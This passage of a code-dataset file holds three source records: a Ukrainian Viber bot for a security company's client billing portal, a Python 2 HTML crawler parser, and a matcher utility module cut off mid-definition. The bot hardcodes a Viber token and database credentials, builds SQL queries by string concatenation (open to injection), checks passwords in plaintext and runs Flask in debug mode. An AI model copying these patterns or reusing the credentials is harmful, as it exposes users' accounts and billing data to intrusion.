\"reply\",\r\n \"ActionBody\": \"Перейти до оплати\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 6,\r\n \"Rows\": 1,\r\n \"Text\": \"Інформація по рахунку\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Інформація по рахунку\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Наші реквізити\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Наші реквізити\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Фінансова історія\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Фінансова історія\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Соц мережі\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Соц мережі\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 3,\r\n \"Rows\": 1,\r\n \"Text\": \"Графік роботи\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Графік роботи\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 6,\r\n \"Rows\": 1,\r\n \"Text\": \"Контакти\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Контакти\",\r\n \"ReplyType\": \"message\"\r\n },\r\n {\r\n \"Columns\": 6,\r\n \"Rows\": 1,\r\n \"Text\": \"Вийти...\",\r\n \"BgColor\": \"#000000\",\r\n \"BgLoop\": True,\r\n \"ActionType\": \"reply\",\r\n \"ActionBody\": \"Вийти...\",\r\n \"ReplyType\": \"message\"\r\n }\r\n ]\r\n }\r\nport = int(os.environ.get('PORT', 5000))\r\n\r\napp = Flask(__name__)\r\nviber = Api(BotConfiguration(\r\n name='PRIMESECURITYBOT',\r\n avatar='http://viber.com/avatar.jpg',\r\n auth_token='4c620ba834000fe9-3e3fd4704ca10b76-4f4b031a6097aa0b'\r\n))\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef incoming():\r\n logger.debug(\"received request. post data: {0}\".format(request.get_data()))\r\n viber_request = viber.parse_request(request.get_data())\r\n\r\n if isinstance(viber_request, ViberMessageRequest):\r\n global temp_password\r\n global temp_chat_id\r\n message = viber_request.message\r\n\r\n if message.text == 'Увійти':\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Введіть, будь ласка, свій особовий рахунок')])\r\n\r\n elif len(message.text) == 9:\r\n def password_saving(client_id):\r\n viber.send_messages(viber_request.sender.id,\r\n [TextMessage(text='Введіть, будь ласка, свій пароль')])\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cursor = link.cursor()\r\n password_query = \"\"\"SELECT user_password FROM users WHERE user_id='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cursor.execute(password_query)\r\n password = cursor.fetchone()\r\n link.commit()\r\n return password\r\n\r\n SESSION['client_id'] = message.text\r\n temp_password = password_saving(message.text)\r\n elif len(message.text) == 5:\r\n str_correct_password = str(temp_password)\r\n maybe_password = \"('\" + message.text + \"',)\"\r\n if str_correct_password == maybe_password:\r\n temp_chat_id = viber_request.sender.id\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Вітаємо в персональному кабінеті! Ви успішно залоговані.',\r\n keyboard=smm_keyboard)])\r\n\r\n def client_contract_extracting(client_id):\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cursor = link.cursor()\r\n client_contract_query = \"\"\"SELECT user_contract_num FROM users WHERE user_id='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cursor.execute(client_contract_query)\r\n contract = cursor.fetchone()\r\n return contract\r\n\r\n def client_compani(client_id):\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cursor = link.cursor()\r\n client_compani = \"\"\"SELECT user_compani FROM users WHERE user_id='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cursor.execute(client_compani)\r\n compani = cursor.fetchone()\r\n return compani\r\n\r\n def client_tariff_extracting(client_id):\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cur = link.cursor()\r\n client_contract_query = \"\"\"SELECT user_tax FROM users WHERE user_id='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cur.execute(client_contract_query)\r\n tariff = cur.fetchone()\r\n return tariff[0]\r\n\r\n def client_debt_extracting(client_id):\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cur = link.cursor()\r\n client_rev_query = \"\"\"SELECT SUM(transaction_sum) FROM payment_story WHERE transaction_client='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cur.execute(client_rev_query)\r\n rev = cur.fetchone()\r\n client_debt_at_the_start_query = \"\"\"SELECT user_balance FROM users WHERE user_id='\"\"\" + client_id + \"\"\"'\"\"\"\r\n cur.execute(client_debt_at_the_start_query)\r\n debt_at_the_start = cur.fetchone()\r\n if rev[0]:\r\n result_sum = debt_at_the_start[0] + rev[0]\r\n else:\r\n result_sum = debt_at_the_start[0] + 0\r\n return result_sum\r\n\r\n SESSION['is_auth'] = True\r\n SESSION['client_compani'] = client_compani(SESSION['client_id'])\r\n print(SESSION['client_compani'])\r\n SESSION['client_contract'] = client_contract_extracting(SESSION['client_id'])\r\n SESSION['client_tariff'] = client_tariff_extracting(SESSION['client_id'])\r\n SESSION['client_debt'] = client_debt_extracting(SESSION['client_id'])\r\n SESSION['client_recommended_payment'] = SESSION['client_debt'] + SESSION['client_tariff']\r\n SESSION['client_for_year_payment'] = float(SESSION['client_tariff']) * 12 * 0.9\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='В меню ви можете знайти доступні операції та здійснити оплату',\r\n keyboard=smm_keyboard)])\r\n\r\n elif str_correct_password != maybe_password:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Введені дані некоректні! Перевірте пароль та спробуйте ще раз.', keyboard=keyboard)])\r\n\r\n elif len(message.text) != 5:\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Введені дані некоректні! Спробуйте ще раз.',\r\n keyboard=keyboard)])\r\n\r\n\r\n elif message.text == 'Вийти...' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Ви успішно вийшли з персонального кабінету!', keyboard=keyboard)])\r\n\r\n SESSION['is_auth'] = False\r\n SESSION['client_id'] = None\r\n SESSION['client_contract'] = None\r\n SESSION['client_debt'] = None\r\n SESSION['client_tariff'] = None\r\n SESSION['client_recommended_payment'] = None\r\n SESSION['client_for_year_payment'] = None\r\n\r\n elif message.text == 'Стан рахунку' and SESSION['is_auth']:\r\n if SESSION['client_debt'] > 0:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text=\"\"\"Ваша заборгованість: \"\"\" + str(\r\n SESSION['client_debt']) + \"\"\" гривень. \\nБудь ласка, сплатіть її до 10 числа поточного місяця.\"\"\", keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Рекомендований платіж: ' + str(SESSION['client_recommended_payment']) + ' гривень', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Разовий платіж за рік: ' + str(SESSION['client_for_year_payment']) + ' гривень',\r\n keyboard=smm_keyboard)])\r\n else:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(\r\n text='Шановний клієнте, у вас відсутня заборгованість! ' + 'Ваш авансовий платіж: ' + str(\r\n SESSION['client_debt']).replace('-', '+') + ' гривень. \\nДякуємо, що вчасно сплачуєте рахунки!', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Разовий платіж за рік: ' + str(SESSION['client_for_year_payment']) + ' гривень',\r\n keyboard=smm_keyboard)])\r\n\r\n elif message.text == 'Інформація по рахунку' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id,\r\n [TextMessage(text='Ваш особовий рахунок: ' + str(SESSION['client_id']), keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(\r\n text='Ваш номер договору: ' + str(SESSION['client_contract']).replace('(', '').replace(\"'\", '').replace(\r\n ',',\r\n '').replace(\r\n ')', ''), keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [\r\n TextMessage(text='Сума щомісячного платежу: ' + str(SESSION['client_tariff']) + ' гривень',\r\n keyboard=smm_keyboard)])\r\n \r\n elif str(SESSION['client_compani']).replace('(', '').replace(\"'\", '').replace(\r\n ',',\r\n '').replace(\r\n ')', '') == '1' and message.text == 'Наші реквізити':\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text=\r\n'''ТОВ «ПРАЙМ-СЕКЬЮРІТІ-1»\r\nЮридична адреса: 08130, Київська область, Києво-Святошинський район, село Петропавлівська Борщагівка, вул. Миру, 11, оф. 150\r\nп/р UA513348510000000026004112772\r\nв АТ «ПУМБ», МФО 334851\r\nКод ЄДРПОУ 43587382\r\nТел: +38 067 400 83 70 \r\nПошта: manager@prime.net.ua''', keyboard=smm_keyboard)])\r\n elif str(SESSION['client_compani']).replace('(', '').replace(\"'\", '').replace(\r\n ',',\r\n '').replace(\r\n ')', '') == '2' and message.text == 'Наші реквізити':\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text=\r\n'''ТОВ «ПРАЙМ-СЕКЬЮРІТІ-2»\r\nЮридична адреса: 08130, Київська область, Києво-Святошинський район, село Петропавлівська Борщагівка, вул. Миру, 11, оф. 150\r\nп/р UA063348510000000026000132217\r\nв АТ «ПУМБ» МФО 334851\r\nКод ЄДРПОУ 44135940\r\nТел: +38 067 400 83 70 \r\nПошта: manager@prime.net.ua''', keyboard=smm_keyboard)])\r\n elif message.text == 'Фінансова історія' and SESSION['is_auth']:\r\n def payment_extracting(client_id):\r\n link = pymysql.connect('prime00.mysql.tools', 'prime00_clients', '8y&@40oInG', 'prime00_clients')\r\n cur = link.cursor()\r\n query_4_countcheck = \"SELECT transaction_id FROM payment_story WHERE transaction_client='\" + client_id + \"'ORDER BY transaction_id DESC LIMIT 10\"\r\n cur.execute(query_4_countcheck)\r\n countcheck = cur.fetchall()\r\n cur = link.cursor()\r\n query_id = \"SELECT transaction_id FROM payment_story WHERE transaction_client='\" + client_id + \"' ORDER BY transaction_id DESC\"\r\n cur.execute(query_id)\r\n payment_ids = cur.fetchall()\r\n query_datetime = \"SELECT transaction_datetime FROM payment_story WHERE transaction_client='\" + client_id + \"'ORDER BY transaction_id DESC\"\r\n cur.execute(query_datetime)\r\n payment_datetimes = cur.fetchall()\r\n query_type = \"SELECT transaction_type FROM payment_story WHERE transaction_client='\" + client_id + \"'ORDER BY transaction_id DESC\"\r\n cur.execute(query_type)\r\n payment_types = cur.fetchall()\r\n query_sum = \"SELECT transaction_sum FROM payment_story WHERE transaction_client='\" + client_id + \"'ORDER BY transaction_id DESC\"\r\n cur.execute(query_sum)\r\n payment_sums = cur.fetchall()\r\n i = 0\r\n while i < len(countcheck):\r\n viber.send_messages(viber_request.sender.id, [TextMessage(\r\n text='id: ' + str(payment_ids[i]).replace('(', '').replace(',', '').replace(')', '') + ''', \r\n дата: ''' + str(payment_datetimes[i]).replace('(', '').replace(',', '').replace(')', '').replace('d',\r\n '').replace(\r\n 'a', '').replace('t', '').replace('e', '').replace('i', '').replace('m', '').replace(\r\n '.', '').replace(' ', '-').replace('-0-0', '') + ''',\r\n тип транзакції: ''' + str(payment_types[i]).replace('(', '').replace(',', '').replace(')', '').replace(\"'\",\r\n '').replace(\r\n 'nachislenie', 'нарахування').replace('oplata schota', 'оплата') + ''', \r\n сума: ''' + str(payment_sums[i]).replace('D', '').replace('e', '').replace('c', '').replace('i',\r\n '').replace('m',\r\n '').replace(\r\n 'a', '').replace('l', '').replace('(', '').replace(\"'\", '').replace(')', '').replace(\r\n ',', '') + ' гривень', keyboard=smm_keyboard)])\r\n i = i + 1\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Останні транзакції:', keyboard=smm_keyboard)])\r\n payment_extracting(SESSION['client_id'])\r\n elif message.text == 'Соц мережі' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Facebook PrimeSecurity: https://www.facebook.com/prime.securiity/', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Facebook Игорь Лаптев: https://www.facebook.com/imlaptev', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Instagram PrimeSecurity: https://instagram.com/prime_security_ua?igshid=27lla3fgykge', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Instagram Игорь Лаптев: https://instagram.com/imlaptev?igshid=ha5gbfpp18vo', keyboard=smm_keyboard)])\r\n elif message.text == 'Соц мережі' and message.text != SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Facebook PrimeSecurity: https://www.facebook.com/prime.securiity/', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Facebook Игорь Лаптев: https://www.facebook.com/imlaptev', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Instagram PrimeSecurity: https://instagram.com/prime_security_ua?igshid=27lla3fgykge', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Instagram Игорь Лаптев: https://instagram.com/imlaptev?igshid=ha5gbfpp18vo', keyboard=keyboard)])\r\n\r\n elif message.text == 'Контакти' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Бухгалтерія: 067-400-83-70', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Гаряча лінія: 067-323-80-08', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Пошта: manager@prime.net.ua', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Наш сайт: https://www.prime.net.ua/', keyboard=smm_keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='с. Петропавлівська Борщагівка ЖК «Львівський», вул. Миру 11 буд. 11 офіс 150', keyboard=smm_keyboard)])\r\n elif message.text == 'Контакти' and message.text != SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Бухгалтерія: 067-400-83-70', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Гаряча лінія: 067-323-80-08', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Пошта: manager@prime.net.ua', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Наш сайт: https://www.prime.net.ua/', keyboard=keyboard)])\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='с. Петропавлівська Борщагівка ЖК «Львівський», вул. Миру 11 буд. 11 офіс 150', keyboard=keyboard)])\r\n\r\n elif message.text == 'Графік роботи' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='''Понеділок: 09:00-18:00\r\nВівторок: 09:00-18:00\r\nСереда: 09:00-18:00\r\nЧетвер: 09:00-18:00\r\nП'ятниця: 09:00-18:00\r\nСубота: вихідний\r\nНеділя: вихідний\r\n13:00-14:00 - обід''', keyboard=smm_keyboard)])\r\n elif message.text == 'Графік роботи' and message.text != SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='''Понеділок: 09:00-18:00\r\nВівторок: 09:00-18:00\r\nСереда: 09:00-18:00\r\nЧетвер: 09:00-18:00\r\nП'ятниця: 09:00-18:00\r\nСубота: вихідний\r\nНеділя: вихідний\r\n13:00-14:00 - обід''', keyboard=keyboard)])\r\n\r\n elif message.text == 'Перейти до оплати' and str(SESSION['client_compani']).replace('(', '').replace(\"'\", '').replace(\r\n ',',\r\n '').replace(\r\n ')', '') == '1' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Портмоне: portmone.com.ua/r3/ru/terminal/index/index/id/28649', keyboard=smm_keyboard)])\r\n elif message.text == 'Перейти до оплати' and str(SESSION['client_compani']).replace('(', '').replace(\"'\", '').replace(\r\n ',',\r\n '').replace(\r\n ')', '') == '2' and SESSION['is_auth']:\r\n viber.send_messages(viber_request.sender.id, [TextMessage(text='Портмоне: portmone.com.ua/r3/oplata-ohrany-prime-security-kievskaya-oblast', keyboard=smm_keyboard)])\r\n\r\n elif isinstance(viber_request, ViberConversationStartedRequest):\r\n viber.send_messages(viber_request.user.id, [TextMessage(text=\"Вітаємо! Натисніть на кнопку для того, щоб увійти в персональний кабінет клієнта.\", keyboard=keyboard)])\r\n\r\n elif isinstance(viber_request, ViberFailedRequest):\r\n logger.warn(\"client failed receiving message. failure: {0}\".format(viber_request), keyboard=keyboard)\r\n\r\n return Response(status=200)\r\n\r\n\r\ndef set_webhook(vib):\r\n viber.unset_webhook()\r\n time.sleep(1)\r\n viber.set_webhook(f'https://serene-river-66909.herokuapp.com/')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n scheduler = sched.scheduler(time.time, time.sleep)\r\n scheduler.enter(5, 1, set_webhook, (viber,))\r\n t = threading.Thread(target=scheduler.run)\r\n t.start()\r\n\r\n app.run(host='0.0.0.0', port=port, debug=True)\r\n","repo_name":"chernysh2909/PrimeViberBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26969,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38882726357","text":"# coding=utf-8\nimport urlparse\n\nfrom bs4 import BeautifulSoup\nfrom Util import Matcher\n\nmatcher = Matcher.Matcher()\n\n\nclass HtmlParser(object):\n def getNewUrls(self, newUrl, soup):\n newUrls = set()\n links = soup.find_all('a', href=matcher.getPattern('appLink'))\n for link in links:\n url = link['href']\n newFullUrl = urlparse.urljoin(newUrl, url)\n newUrls.add(newFullUrl)\n return newUrls\n\n def getNewData(self, newUrl, soup):\n newData = dict()\n newData['url'] = newUrl\n if matcher.getPattern('appLink').search(newUrl):\n try:\n # 如果正在爬取的页面是app页面\n '''\n AppZapp - 8bitWar: Apokalyps\n '''\n nameNode = soup.find('title')\n newData['name'] = nameNode.get_text()\n '''\n
7 Hits
\n '''\n hitNode = soup.find('div', id=\"PortalClicks\").find('b')\n '''\n
Likes 0
\n '''\n likeNode = soup.find('div', id=\"AppDetailLikes\").find('b')\n newData['hits'] = hitNode.get_text()\n newData['likes'] = likeNode.get_text()\n return newData\n except:\n return\n else:\n # 如果正在爬取的页面是目录页面\n return None\n\n def getNewAppUrls(self, soup):\n newUrls = set()\n links = soup.find_all('a', href=matcher.getPattern('appLink'))\n for link in links:\n url = link['href']\n newFullUrl = urlparse.urljoin('http://www.appzapp.us', url)\n newUrls.add(newFullUrl)\n return newUrls\n\n def parse(self, newUrl, htmlContent):\n if newUrl is None or htmlContent is None:\n return\n soup = BeautifulSoup(htmlContent, 'html.parser')\n newUrls = self.getNewUrls(newUrl, soup)\n newData = self.getNewData(newUrl, soup)\n return newUrls, newData\n\n def pageParse(self, driver):\n if driver is None:\n return\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n newAppUrls = self.getNewAppUrls(soup)\n return newAppUrls\n","repo_name":"ZyzyPeter/AppCrawler-Analysis","sub_path":"WebCrawler/Service/Html_Parser.py","file_name":"Html_Parser.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5911778514","text":"import re\nimport sys\nfrom abc import ABC, abstractmethod\nfrom datetime import datetime, timedelta, timezone\nfrom enum import Enum\nfrom itertools import product\nfrom typing import Any, Dict, List, Optional\n\nfrom synth_tools import log\nfrom synth_tools.utils import fail\n\n\nclass Matcher(ABC):\n SPECIAL = {\n \"all\": \"AllMatcher\",\n \"any\": \"AnyMatcher\",\n \"one_of_each\": \"OneOfEachMatcher\",\n }\n\n @abstractmethod\n def match(self, data: object) -> bool:\n raise NotImplementedError\n\n\nclass PropertyMatcher(Matcher):\n class MatchFunctionType(Enum):\n direct = 0\n regex = \"regex\"\n contains = \"contains\"\n one_of = \"one_of\"\n older_than = \"older_than\"\n newer_than = \"newer_than\"\n\n def __init__(self, key: str, value: Any):\n self.match_type = self.MatchFunctionType.direct\n self.value: Any = value\n self.key = key\n self._fn = self._match_direct\n self.is_negation = False\n # handle special functions\n if type(self.value) == str:\n if self.value.startswith(\"!\"):\n self.is_negation = True\n self.value = self.value[1:]\n m = re.match(\n r\"({})\\((.*)\\)\".format(\"|\".join([t.value for t in self.MatchFunctionType if t.value])), self.value\n )\n if m:\n try:\n self.match_type = self.MatchFunctionType(m.group(1))\n except ValueError:\n log.debug(\n \"%s: unknown match function '%s' - treating as direct\", self.__class__.__name__, m.group(1)\n )\n if self.match_type == self.MatchFunctionType.regex:\n self.value = re.compile(m.group(2))\n self._fn = self._match_regex\n elif self.match_type == self.MatchFunctionType.contains:\n self.value = m.group(2)\n self._fn = self._match_contains\n elif self.match_type == self.MatchFunctionType.one_of:\n self.value = [s.strip() for s in m.group(2).split(\",\")]\n self._fn = self._match_one_of\n elif self.match_type == self.MatchFunctionType.older_than:\n self._value_from_ts(m.group(2))\n self._fn = self._match_older_than\n elif self.match_type == self.MatchFunctionType.newer_than:\n self._value_from_ts(m.group(2))\n self._fn = self._match_newer_than\n log.debug(\n \"%s: key: '%s' value: '%s' match_type: '%s' is_negation: '%s'\",\n self.__class__.__name__,\n self.key,\n self.value,\n self.match_type.value,\n self.is_negation,\n )\n\n def match(self, data: Any) -> bool:\n log.debug(\"%s: matching key: '%s', data: '%s'\", self.__class__.__name__, self.key, str(data))\n # handle special properties\n if self.key == \"label\" and hasattr(data, \"has_label\"):\n log.debug(\"%s: matching label\", self.__class__.__name__)\n return self._match_label(data) ^ self.is_negation\n\n key_path = self.key.split(\".\")\n obj = data\n k = self.key # to make linters happy\n while key_path:\n k = key_path.pop(0)\n log.debug(\"%s: matching k: '%s', obj: '%s'\", self.__class__.__name__, k, str(obj))\n if obj is None:\n return False\n if hasattr(obj, k):\n obj = getattr(obj, k)\n else:\n try:\n obj = obj[k] # type: ignore\n except (KeyError, TypeError):\n log.debug(\"%s: object: does not have property '%s'\", self.__class__.__name__, self.key)\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, False)\n return False\n if isinstance(obj, Enum):\n v = obj.value\n else:\n v = obj\n log.debug(\n \"%s: matching '%s' '%s': '%s', value: '%s'\", self.__class__.__name__, k, self.match_type.name, self.value, v\n )\n ret = self._fn(v) ^ self.is_negation\n log.debug(\"%s: ret %s\", self.__class__.__name__, ret)\n return ret\n\n def _match_label(self, obj: Any) -> bool:\n if self.match_type == self.MatchFunctionType.direct:\n ret = obj.has_label(self.value) # type: ignore\n elif self.match_type == self.MatchFunctionType.one_of:\n ret = any(obj.has_label(label) for label in self.value)\n else:\n log.error(\n \"'%s' function is not supported for matching attribute 'label' of '%s'\",\n self.match_type.name,\n obj.__class__.__name__,\n )\n ret = self.is_negation\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, ret)\n return ret\n\n def _match_direct(self, obj: Any) -> bool:\n return str(obj) == str(self.value)\n\n def _match_regex(self, obj: Any) -> bool:\n # noinspection PyUnresolvedReferences\n return self.value.match(str(obj)) is not None\n\n def _match_contains(self, obj: Any) -> bool:\n if type(obj) == str:\n return self.value in obj\n if hasattr(obj, \"__iter__\"):\n log.debug(\"%s: '%s' is iterable\", self.__class__.__name__, obj)\n return self.value in [str(x) for x in obj]\n else:\n return self.value == obj or str(self.value) == str(obj)\n\n def _match_one_of(self, obj: Any) -> bool:\n return any(str(obj) == v for v in self.value)\n\n def _match_older_than(self, obj: Any) -> bool:\n if not self.value:\n # config had invalid time specification, nothing can match\n return False\n ts = self._ts_from_string(str(obj))\n if not ts:\n log.error(\"%s: Cannot parse time: '%s'\", self.__class__.__name__, str(obj))\n return self.is_negation\n else:\n return ts < self.value # type:ignore\n\n def _match_newer_than(self, obj: Any) -> bool:\n if not self.value:\n # config had invalid time specification, nothing can match\n return False\n ts = self._ts_from_string(str(obj))\n if not ts:\n log.error(\"%s: Cannot parse time: '%s'\", self.__class__.__name__, str(obj))\n return self.is_negation\n else:\n return ts > self.value # type:ignore\n\n @staticmethod\n def _interval_from_string(s: str) -> Optional[timedelta]:\n NUMBER = r\"-?\\d+(?:\\.\\d+)?\"\n UNITS = {\n \"weeks\": r\"w(?:eek(:?s)?)?\",\n \"days\": r\"d(?:ay(?:s)?)?\",\n \"hours\": r\"h(?:our(:?s)?)?\",\n \"minutes\": r\"m(?:in(?:ute)?(:?s?))?\",\n \"seconds\": r\"s(?:ec(?:ond)?(:?s)?)?\",\n \"milliseconds\": r\"m(?:illi)?s(?:ec(?:ond)?(:?s)?)?\",\n \"microseconds\": r\"(?:u|micro)s(?:ec(?:ond)?(:?s)?)?\",\n }\n for unit, unit_exp in UNITS.items():\n m = re.fullmatch(f\"({NUMBER})\\\\s*{unit_exp}\", s)\n if m:\n try:\n number = float(m.groups()[0])\n except ValueError:\n return None\n return timedelta(**{unit: number})\n return None\n\n @staticmethod\n def _ts_from_string(s: str) -> Optional[datetime]:\n try:\n return datetime.fromisoformat(s)\n except ValueError:\n pass\n if s.endswith(\"Z\"):\n try:\n return datetime.fromisoformat(s.replace(\"Z\", \"+00:00\").replace(\"T\", \" \"))\n except ValueError:\n return None\n else:\n return None\n\n def _value_from_ts(self, arg: str) -> None:\n if arg == \"now\":\n self.value = datetime.now(tz=timezone.utc)\n elif arg == \"today\":\n self.value = datetime.now(tz=timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0)\n elif arg == \"yesterday\":\n self.value = datetime.now(tz=timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0) - timedelta(\n days=1\n )\n elif arg == \"tomorrow\":\n self.value = datetime.now(tz=timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0) + timedelta(\n days=1\n )\n else:\n delta = self._interval_from_string(arg)\n if delta:\n self.value = datetime.now(tz=timezone.utc) + delta\n else:\n try:\n self.value = datetime.fromisoformat(arg)\n if not self.value.tzinfo:\n log.debug(\"Setting timezone to UTC for match time '%s'\", self.value.isoformat())\n self.value = self.value.replace(tzinfo=timezone.utc)\n except ValueError as exc:\n log.error(\"%s: Invalid time specification: %s\", self.__class__.__name__, arg)\n self.value = None\n\n\nclass SetMatcher(Matcher):\n def __init__(\n self,\n data: List[Dict[str, Any]],\n max_matches: Optional[int] = None,\n ):\n self.matchers = []\n self.max_matches: Optional[int] = max_matches\n self._done = False\n if type(data) != list:\n raise RuntimeError(f\"Invalid match specification: {data}\")\n for e in data:\n if type(e) != dict:\n raise RuntimeError(f\"Invalid match specification: {data}\")\n for k, v in e.items():\n if k in self.SPECIAL:\n matcher = getattr(sys.modules[__name__], self.SPECIAL[k])(v)\n else:\n matcher = PropertyMatcher(k, v)\n self.matchers.append(matcher)\n log.debug(\"%s: %d matchers, max_matches: %s\", self.__class__.__name__, len(self.matchers), self.max_matches)\n\n def match(self, data: object) -> bool:\n if self._done:\n return False\n if self.max_matches is not None and self.max_matches == 0:\n log.debug(\"%s: match limit reached\", self.__class__.__name__)\n self._done = True\n return False\n return self.do_match(data)\n\n @abstractmethod\n def do_match(self, data: object) -> bool:\n raise NotImplementedError\n\n\nclass AllMatcher(SetMatcher):\n def do_match(self, data: object) -> bool:\n for m in self.matchers:\n if not m.match(data):\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, False)\n return False\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, True)\n if self.max_matches is not None:\n self.max_matches -= 1\n return True\n\n\nclass AnyMatcher(SetMatcher):\n def do_match(self, data: object) -> bool:\n if not self.matchers:\n log.debug(\"%s: no matchers: ret '%s'\", self.__class__.__name__, True)\n if self.max_matches is not None:\n self.max_matches -= 1\n return True\n for m in self.matchers:\n if m.match(data):\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, True)\n if self.max_matches is not None:\n self.max_matches -= 1\n return True\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, False)\n return False\n\n\nclass OneOfEachMatcher(Matcher):\n def __init__(self, data: Dict[str, List]):\n self.match_vector = data.keys()\n self.match_set = set([tuple(x) for x in product(*[data[k] for k in self.match_vector])])\n log.debug(\n \"%s: match_set: '%s'\",\n self.__class__.__name__,\n \", \".join(\"|\".join(str(e) for e in x) for x in self.match_set),\n )\n\n def match(self, data: Any) -> bool:\n if not self.match_set:\n log.debug(\"%s: match set is empty\", self.__class__.__name__)\n return False\n m = tuple(data[k] for k in self.match_vector)\n log.debug(\"%s: matching: '%s'\", self.__class__.__name__, \"|\".join(str(x) for x in m))\n if m in self.match_set:\n self.match_set.remove(m)\n log.debug(\"%s: remaining %d in match_set\", self.__class__.__name__, len(self.match_set))\n ret = True\n else:\n ret = False\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, ret)\n return ret\n\n\ndef 